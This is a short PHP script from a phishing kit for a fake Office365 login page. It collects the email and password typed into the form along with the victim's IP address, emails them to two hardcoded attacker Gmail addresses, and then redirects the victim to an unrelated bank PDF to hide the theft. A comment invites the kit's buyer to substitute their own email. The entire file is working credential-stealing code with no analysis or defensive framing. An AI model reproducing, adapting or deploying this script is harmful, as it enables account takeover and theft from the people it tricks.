<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------Office365 Info-----------------------\n";
$message .= "Email            : ".$_POST['formtext1']."\n";
$message .= "Password            : ".$_POST['formtext2']."\n";
$message .= "IP                     : ".$ip."\n";
$message .= "---------------Created BY BURHAN FUDPAGE [.] COM-------------\n";
//Change Your Email Here...
$send = "limallen412@gmail.com, sraymond779@gmail.com";
$subject = "Result from Unknown";
$headers = "From: Office365 Info<customer-support@mrs>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}

		   header("Location: http://www.woodforest.com/uploadedFiles/AccountDisclosures/ETM-21.pdf");

	 
?>